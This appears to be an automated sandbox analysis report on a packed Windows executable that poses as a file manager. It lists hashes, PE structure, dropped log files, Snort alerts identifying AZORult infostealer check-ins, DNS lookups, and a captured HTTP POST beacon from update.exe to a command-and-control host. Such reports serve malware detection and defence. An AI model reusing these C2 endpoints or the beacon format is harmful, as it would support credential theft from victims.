MD5:	F5561BEACF73E8F22AE653BCB64E2E75
SHA1:	7E2040EA37E77A593B16F66131958C9BC39B14F5
SHA-256:	DD3B1B6E081034B6EA7B43FA7BCD2E008F7228A89014ECF8465863ADB8C04CD3
SHA-512:	96F65778464684030AA2A31422EE7A5CC4683C6C975DB600C4CFEBD5B9ED8CC1B9213F07A2B3EBBDB73868C44CCE027999C6CC6B61AFD30864434E741D38EF4F
Malicious:	false
Reputation:	unknown
Preview:	.[0]..Path=C:\Users\user\Desktop..Caption=Desktop..ItemType=0..GroupIndex=0....[1]..Path=C:\Users\user\Downloads..Caption=Downloads..ItemType=0..GroupIndex=0....[2]..Path=C:\Users\user\Documents..Caption=Documents..ItemType=0..GroupIndex=0....[3]..Path=C:\Users\user\Pictures..Caption=Pictures..ItemType=0..GroupIndex=0....[4]..Path=C:\Users\user\Music..Caption=Music..ItemType=0..GroupIndex=0....[5]..Path=C:\Users\user\Videos..Caption=Videos..ItemType=0..GroupIndex=0....[6]..Path=Libraries..Caption=Libraries..ItemType=0..GroupIndex=0....[7]..Path=Recycle Bin..Caption=Recycle Bin..ItemType=0..GroupIndex=0....[8]..Path=..Caption=This PC..ItemType=0..GroupIndex=0....[9]..Path=C:..Caption=Local Disk (C:)..ItemType=0..GroupIndex=0....[10]..Path=D:..Caption=DVD Drive (D:)..ItemType=0..GroupIndex=0....[11]..Path=c:\windows\notepad.exe..Caption=Notepad..ItemType=0..GroupIndex=0....[12]..Path=c:\windows\System32\calc.exe..Caption=Calculator..ItemType=0..GroupIndex=0....[IntegrityCheckingS

C:\Users\user\Documents\Chameleon files\Log\explorer.log Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	294
Entropy (8bit):	3.423671033789063
Encrypted:	false
SSDEEP:	6:QJfJ0lulC+Sk2lAmEoclcbgalulC+Sk2lAmEoclcbsJUrMJ2wlw:Q9rqjEocRrqjEocBJUQJbw
MD5:	E22283B5D556EA108478EB57C22ABBBD
SHA1:	37793C72D68AF6D5BE3AEAE610D50785AD6DEFC9
SHA-256:	682729654E540F9B96A446AF086C64C64B53AC09E864FB007D592DEAF8678ABA
SHA-512:	02458A8A945DB5E25A1CAE6DE8D3FD4B24DA578FD186621DAA52B208745392681DC9BB666C802897AD206A6281D6FEDDECEFFEE9DE20D50088561AEBCF82BC4A
Malicious:	false
Reputation:	unknown
Preview:	..1.2.:.4.4.:.0.5. .A.M. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....1.2.:.4.3.:.4.9. .A.M. .:. .I.m.p.o.r.t.W.i.n.d.o.w.s.S.e.t.t.i.n.g.s. .P.A.R.A.M.S.:. .b.e.g.i.n.....1.2.:.4.3.:.5.4. .A.M. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.........

C:\Users\user\Documents\Chameleon files\Log\folder.log Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	6570
Entropy (8bit):	3.6098949754922423
Encrypted:	false
SSDEEP:	48:7UnX16olQ+gyr+ZbJaFDRra2VYeDhVTmOkgOkcipfFfYcRRHJqLOJRdecuRjnaDS:gnX16olG2+CfFf5HHJWGRdbGjnaGc6
MD5:	3FFC790347CEC26F60A033C111AA2968
SHA1:	4BB731609911C03F4362B67EB5D7C62B281F4FDE
SHA-256:	639CDD72E847F5480D1334444CBC831A922A8ED27BC90113879F4B6179884C97
SHA-512:	7DE4444831802777093F23A88BC39BC0AB2B8A86B8208C293A7865595F673448567888306F2FE68723BBC67B6DE07111C4AB6E83A96C41AA5FA51B1EE7E88862
Malicious:	false
Reputation:	unknown
Preview:	..1.2.:.4.3.:.3.6. .A.M. .:. .D.e.l.e.t.e.F.r.o.m.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .D.e.l.e.t.e.T.a.s.k. .f.a.i.l. .C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.h.a.r.d.z.....1.2.:.4.3.:.3.6. .A.M. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .S.t.a.r.t.....1.2.:.4.3.:.3.6. .A.M. .:. .L.a.u.n.c.h.T.h.r.o.u.g.h.S.c.h.e.d.u.l.e.r. .P.A.R.A.M.S.:. .I.s.N.e.w.=.C.h.a.m.e.l.e.o.n. .F.o.l.d.e.r.-.h.a.r.d.z.....1.2.:.4.3.:.4.0. .A.M. .:. .T.r.y.S.c.h.e.d.u.l.e.r.S.t.a.r.t. .P.A.R.A.M.S.:. .A.l.r.e.a.d.y. .e.v.a.l.u.a.t.e.d.....1.2.:.4.3.:.4.3. .A.M. .:. .F.o.l.d.e.r.I.n.i.t. .P.A.R.A.M.S.:. .S.e.t.H.o.o.k.....1.2.:.4.3.:.4.6. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .D.i.s.p.l.a.y.P.a.t.h.=.D.e.s.k.t.o.p.....1.2.:.4.3.:.4.6. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .D.i.s.p.l.a.y.N.a.m.e.=.D.e.s.k.t.o.p.....1.2.:.4.3.:.4.6. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .N.a.m.e.=.D.e.s.k.t.o.p.....1.2.:.4.3.:.4.6. .A.M. .:. .A.d.d. .P.A.R.A.M.S.:. .P.a.t.h.=.C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.D.e.s.k.t.o.p.....

C:\Users\user\Documents\Chameleon files\Log\folder_error.log Download File
Process:	C:\Program Files (x86)\Chameleon Explorer\ChameleonFolder.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	11288
Entropy (8bit):	3.6379280096461546
Encrypted:	false
SSDEEP:	96:9hrIC5qq2R/2qAHcKzv2+7hrIgC5qq2R/2qAHcKzv2+thrIgim5qq2R/2qAHcKzA:kq4/jAHcKzhq4/jAHcKz2q4/jAHcKzA
MD5:	14C4461B0018F7A0B693799EF237D765
SHA1:	56F034B95F4B1F632C3D7BE22D7D8238E366B40B
SHA-256:	910EACAAB71EECA161BDFA908E5410EAB81478CE0F4E1E2549566EEA16CBA9AB
SHA-512:	2896F5E03FD93A82E2FB4183EAF591D10F9792B113A9CC26A685F83663DF2FBEABFDB2FBDAD59051AF269EFD167ADBD70E0B19587225524939D4B03294A853EC
Malicious:	false
Reputation:	unknown
Preview:	..1.1./.2.4./.2.0.2.1. .1.2.:.4.3.:.4.9. .A.M.:. .E.R.R.O.R. .(.).:. .G.e.t.F.o.l.d.e.r.E.x.p.l.o.r.e.r.H.a.n.d.l.e. .M.E.S.S.:. .R.e.s.u.l.t. .e.m.p.t.y.....L.a.s.t. .s.y.s.t.e.m. .e.r.r.o.r.:. .T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y. .(.0.).....C.o.m.p.i.l.e.T.i.m.e.:. .2.4.-.1.2.-.2.0.1.6. .1.4.-.1.7.....T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....I.s.P.r.o.g.r.a.m.T.e.r.m.i.n.a.t.e.d.:. .F.a.l.s.e.....P.r.o.d.u.c.t.:. .W.i.n.d.o.w.s. .1.0. .P.r.o.....S.e.r.v.i.c.e. .P.a.c.k.:. .....B.u.i.l.d.:. .0.....V.e.r.s.i.o.n.:. .6.4.-.b.i.t.....U.A.C.:. .e.n.a.b.l.e.d.....U.A.C.:. .e.l.e.v.a.t.e.d.....T.o.t.a.l.P.h.y.s.i.c.a.l.M.e.m.o.r.y.:. .8.1.9.1.....P.h.y.s.i.c.a.l.M.e.m.o.r.y.L.o.a.d.:. .6.7.....S.w.a.p.F.i.l.e.S.i.z.e.:. .1.2.9.3.....S.w.a.p.F.i.l.e.U.s.a.g.e.:. .2.4.....M.o.n.i.t.o.r. .0.:. .L.:. .0. .T.:. .0. .W.:. .1.2.8.0. .H.:. .1.0.2.4. .I.s.M.a.i.n.:. .1. .W.L.:. .W.T.:. .0. .0. .W.R.:. .0. .W.B.:. .4.0.....C.h.a.m.e.l.e.o.n.E.x.p.l.o.r.e.r...e.x.e. .

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Entropy (8bit):	7.999558743444994
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% UPX compressed Win32 Executable (30571/9) 0.30% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	0331C7BCA665F36513377FC301CBB32822FF35F925115.exe
File size:	7666176
MD5:	56db11a012b50b84e5c527f3d9d9cd89
SHA1:	d10607746d8d0a25b1f4c5de6e4117ccd8d43897
SHA256:	0331c7bca665f36513377fc301cbb32822ff35f92511579d699613f0bb624802
SHA512:	aa0e9b56915d6c623de23e110d8102b8280624775f647022e2df4d502b6b1c1322f3bea2b912e9b4360677f37a52e0fca40134f3f5340d480365ce00e4c7a828
SSDEEP:	196608:DYjLO64m7a5lii3/vxlC7LmaNzsZbfi4r0OK1TndtMD2c0BK+HtD:OS64IaTicvxlC7bNg1nQR56D2c
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

File Icon


Icon Hash:	aab2e3e39383aa00

Static PE Info

General
Entrypoint:	0xbeccb0
Entrypoint Section:	UPX1
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	TERMINAL_SERVER_AWARE, DYNAMIC_BASE
Time Stamp:	0x5BCC75A8 [Sun Oct 21 12:48:40 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	712f4a29c405ecb576101d367b2180fb

Entrypoint Preview

Instruction
pushad
mov esi, 004A5000h
lea edi, dword ptr [esi-000A4000h]
push edi
mov ebp, esp
lea ebx, dword ptr [esp-00003E80h]
xor eax, eax
push eax
cmp esp, ebx
jne 00007FF5A8EBD06Dh
inc esi
inc esi
push ebx
push 007EABC7h
push edi
add ebx, 04h
push ebx
push 00747CA8h
push esi
add ebx, 04h
push ebx
push eax
mov dword ptr [ebx], 00020003h
push ebp
push edi
push esi
push ebx
sub esp, 7Ch
mov edx, dword ptr [esp+00000090h]
mov dword ptr [esp+74h], 00000000h
mov byte ptr [esp+73h], 00000000h
mov ebp, dword ptr [esp+0000009Ch]
lea eax, dword ptr [edx+04h]
mov dword ptr [esp+78h], eax
mov eax, 00000001h
movzx ecx, byte ptr [edx+02h]
mov ebx, eax
shl ebx, cl
mov ecx, ebx
dec ecx
mov dword ptr [esp+6Ch], ecx
movzx ecx, byte ptr [edx+01h]
shl eax, cl
dec eax
mov dword ptr [esp+68h], eax
mov eax, dword ptr [esp+000000A8h]
movzx esi, byte ptr [edx]
mov dword ptr [ebp+00h], 00000000h
mov dword ptr [esp+60h], 00000000h
mov dword ptr [eax], 00000000h
mov eax, 00000300h
mov dword ptr [esp+64h], esi
mov dword ptr [esp+5Ch], 00000001h
mov dword ptr [esp+58h], 00000001h
mov dword ptr [esp+54h], 00000001h
mov dword ptr [esp+50h], 00000001h

Rich Headers

Programming Language:

[ C ] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[LNK] VS2013 UPD5 build 40629
[ASM] VS2013 UPD5 build 40629
[C++] VS2013 build 21005
[ASM] VS2013 build 21005
[RES] VS2013 build 21005
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7f470c	0x404	.rsrc
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x7ee000	0x670c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7f4b10	0x18	.rsrc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x7ed884	0x48	UPX1
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
UPX0	0x1000	0xa4000	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
UPX1	0xa5000	0x749000	0x748a00	unknown	unknown	unknown	unknown	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x7ee000	0x7000	0x6c00	False	0.245515046296	data	5.06363378576	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0xc861c	0x128	data	English	Great Britain
RT_ICON	0xc8744	0x128	data	English	Great Britain
RT_ICON	0xc886c	0x128	data	English	Great Britain
RT_ICON	0x7ee620	0x2e8	data	English	Great Britain
RT_ICON	0x7ee90c	0x128	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0x7eea38	0xea8	data	English	Great Britain
RT_ICON	0x7ef8e4	0x8a8	dBase III DBT, version number 0, next free block index 40	English	Great Britain
RT_ICON	0x7f0190	0x568	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_ICON	0x7f06fc	0x25a8	dBase III DBT, version number 0, next free block index 40	English	Great Britain
RT_ICON	0x7f2ca8	0x10a8	data	English	Great Britain
RT_ICON	0x7f3d54	0x468	GLS_BINARY_LSB_FIRST	English	Great Britain
RT_MENU	0xce514	0x50	data	English	Great Britain
RT_STRING	0xce564	0x594	data	English	Great Britain
RT_STRING	0xceaf8	0x68a	data	English	Great Britain
RT_STRING	0xcf184	0x490	data	English	Great Britain
RT_STRING	0xcf614	0x5fc	data	English	Great Britain
RT_STRING	0xcfc10	0x65c	data	English	Great Britain
RT_STRING	0xd026c	0x466	data	English	Great Britain
RT_STRING	0xd06d4	0x158	data	English	Great Britain
RT_RCDATA	0xd082c	0x68afd0	data	English	Great Britain
RT_RCDATA	0x75b7fc	0x32600	data	English	Great Britain
RT_RCDATA	0x78ddfc	0x4fc20	data
RT_GROUP_ICON	0x7f41c0	0x76	data	English	Great Britain
RT_GROUP_ICON	0x7dda94	0x14	data	English	Great Britain
RT_GROUP_ICON	0x7ddaa8	0x14	data	English	Great Britain
RT_GROUP_ICON	0x7ddabc	0x14	64-bit XCOFF executable or object module	English	Great Britain
RT_VERSION	0x7f423c	0xdc	data	English	Great Britain
RT_MANIFEST	0x7f431c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain

Imports

DLL	Import
ADVAPI32.dll	GetAce
COMCTL32.dll	ImageList_Remove
COMDLG32.dll	GetOpenFileNameW
GDI32.dll	LineTo
IPHLPAPI.DLL	IcmpSendEcho
KERNEL32.DLL	LoadLibraryA, ExitProcess, GetProcAddress, VirtualProtect
MPR.dll	WNetUseConnectionW
ole32.dll	CoGetObject
OLEAUT32.dll	VariantInit
PSAPI.DLL	GetProcessMemoryInfo
SHELL32.dll	DragFinish
USER32.dll	GetDC
USERENV.dll	LoadUserProfileW
UxTheme.dll	IsThemeActive
VERSION.dll	VerQueryValueW
WININET.dll	FtpOpenFileW
WINMM.dll	timeGetTime
WSOCK32.dll	connect

Version Infos

Description	Data
Translation	0x0809 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/24/21-00:43:16.336273	TCP	2029465	ET TROJAN Win32/AZORult V3.2 Client Checkin M15	49744	80	192.168.2.3	35.205.61.67
11/24/21-00:43:19.890087	TCP	2029465	ET TROJAN Win32/AZORult V3.2 Client Checkin M15	49745	80	192.168.2.3	35.205.61.67

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 00:43:15.489695072 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.489748955 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.489913940 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.493859053 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.493887901 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.586143970 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.586229086 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.588742018 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.588757038 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.589127064 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.634673119 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.840540886 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.871823072 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.871951103 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.872066021 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.887341976 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.887388945 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:15.887409925 CET	49743	443	192.168.2.3	5.9.164.117
Nov 24, 2021 00:43:15.887424946 CET	443	49743	5.9.164.117	192.168.2.3
Nov 24, 2021 00:43:16.277457952 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.332606077 CET	80	49744	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:16.334852934 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.336272955 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.634727001 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.693347931 CET	80	49744	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:16.693365097 CET	80	49744	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:16.694818974 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.698415995 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:16.821183920 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:17.009742975 CET	49744	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:17.081671000 CET	80	49744	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:19.822756052 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:19.889728069 CET	80	49745	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:19.890074015 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:19.890086889 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:19.952111959 CET	80	49745	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:19.952153921 CET	80	49745	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:19.952279091 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:19.952639103 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:20.233812094 CET	80	49745	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:20.239264965 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:20.260977030 CET	49745	80	192.168.2.3	35.205.61.67
Nov 24, 2021 00:43:20.341941118 CET	80	49745	35.205.61.67	192.168.2.3
Nov 24, 2021 00:43:25.003736019 CET	49746	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:43:25.021902084 CET	80	49746	142.250.203.115	192.168.2.3
Nov 24, 2021 00:43:25.023552895 CET	49746	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:43:25.023572922 CET	49746	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:43:25.041860104 CET	80	49746	142.250.203.115	192.168.2.3
Nov 24, 2021 00:43:25.442241907 CET	80	49746	142.250.203.115	192.168.2.3
Nov 24, 2021 00:43:25.442322969 CET	49746	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:43:25.937005043 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:25.937052011 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:25.937117100 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:25.965996981 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:25.966037989 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:26.031745911 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:26.031898022 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:26.031932116 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:26.031996965 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:26.479788065 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:26.479835987 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:26.480150938 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:26.480222940 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:26.482623100 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:26.528868914 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:28.700232983 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:28.700330973 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:28.700340033 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:28.700404882 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:28.700735092 CET	49747	443	192.168.2.3	172.217.168.52
Nov 24, 2021 00:43:28.700756073 CET	443	49747	172.217.168.52	192.168.2.3
Nov 24, 2021 00:43:32.168641090 CET	49746	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:44:00.579968929 CET	49751	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:44:00.599622965 CET	80	49751	142.250.203.115	192.168.2.3
Nov 24, 2021 00:44:00.599802017 CET	49751	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:44:00.732887030 CET	49751	80	192.168.2.3	142.250.203.115
Nov 24, 2021 00:44:00.752624989 CET	80	49751	142.250.203.115	192.168.2.3
Nov 24, 2021 00:44:00.881139994 CET	80	49751	142.250.203.115	192.168.2.3
Nov 24, 2021 00:44:00.881726980 CET	49751	80	192.168.2.3	142.250.203.115

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 24, 2021 00:43:15.462136030 CET	56844	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:43:15.479998112 CET	53	56844	8.8.8.8	192.168.2.3
Nov 24, 2021 00:43:16.147013903 CET	58045	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:43:16.256675005 CET	53	58045	8.8.8.8	192.168.2.3
Nov 24, 2021 00:43:16.709975958 CET	57459	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:43:16.820420027 CET	53	57459	8.8.8.8	192.168.2.3
Nov 24, 2021 00:43:24.954884052 CET	57875	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:43:24.987586975 CET	53	57875	8.8.8.8	192.168.2.3
Nov 24, 2021 00:43:25.893655062 CET	54154	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:43:25.934793949 CET	53	54154	8.8.8.8	192.168.2.3
Nov 24, 2021 00:44:00.485775948 CET	64021	53	192.168.2.3	8.8.8.8
Nov 24, 2021 00:44:00.520344973 CET	53	64021	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Nov 24, 2021 00:43:15.462136030 CET	192.168.2.3	8.8.8.8	0x625c	Standard query (0)	2no.co	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:16.147013903 CET	192.168.2.3	8.8.8.8	0x2065	Standard query (0)	finlzzm.com	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:16.709975958 CET	192.168.2.3	8.8.8.8	0x28a5	Standard query (0)	finlzzm.com	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:24.954884052 CET	192.168.2.3	8.8.8.8	0x940	Standard query (0)	www.chameleon-managers.com	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:25.893655062 CET	192.168.2.3	8.8.8.8	0xf112	Standard query (0)	neosoft-activator.appspot.com	A (IP address)	IN (0x0001)
Nov 24, 2021 00:44:00.485775948 CET	192.168.2.3	8.8.8.8	0xbeac	Standard query (0)	www.chameleon-managers.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Nov 24, 2021 00:43:15.479998112 CET	8.8.8.8	192.168.2.3	0x625c	No error (0)	2no.co		5.9.164.117	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:16.256675005 CET	8.8.8.8	192.168.2.3	0x2065	No error (0)	finlzzm.com		35.205.61.67	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:16.820420027 CET	8.8.8.8	192.168.2.3	0x28a5	No error (0)	finlzzm.com		35.205.61.67	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:24.987586975 CET	8.8.8.8	192.168.2.3	0x940	No error (0)	www.chameleon-managers.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 00:43:24.987586975 CET	8.8.8.8	192.168.2.3	0x940	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)
Nov 24, 2021 00:43:25.934793949 CET	8.8.8.8	192.168.2.3	0xf112	No error (0)	neosoft-activator.appspot.com		172.217.168.52	A (IP address)	IN (0x0001)
Nov 24, 2021 00:44:00.520344973 CET	8.8.8.8	192.168.2.3	0xbeac	No error (0)	www.chameleon-managers.com	ghs.googlehosted.com		CNAME (Canonical name)	IN (0x0001)
Nov 24, 2021 00:44:00.520344973 CET	8.8.8.8	192.168.2.3	0xbeac	No error (0)	ghs.googlehosted.com		142.250.203.115	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

2no.co

neosoft-activator.appspot.com

finlzzm.com

www.chameleon-managers.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.3	49743	5.9.164.117	443	C:\Users\user\Desktop\0331C7BCA665F36513377FC301CBB32822FF35F925115.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49747	172.217.168.52	443	C:\Program Files (x86)\Chameleon Explorer\ChameleonExplorer.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49744	35.205.61.67	80	C:\Users\user\AppData\Roaming\update.exe

Timestamp	kBytes transferred	Direction	Data
Nov 24, 2021 00:43:16.336272955 CET	1020	OUT	POST /index.php HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) Host: finlzzm.com Content-Length: 107 Cache-Control: no-cache Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 fd 28 39 ff 4e 4e 8d 28 39 ff 28 39 f1 28 38 8c 4b 2f fb 39 2f fb 35 2f fb 35 2f fb 3b 2f fb 38 4b ed 3e 3f ed 3f 4e 8b 28 39 f1 28 39 f1 28 39 f1 28 39 f1 48 4f ed 3e 3e ed 3e 3a Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9(9NN(9(9(8K/9/5/5/;/8K>??N(9(9(9(9HO>>>:
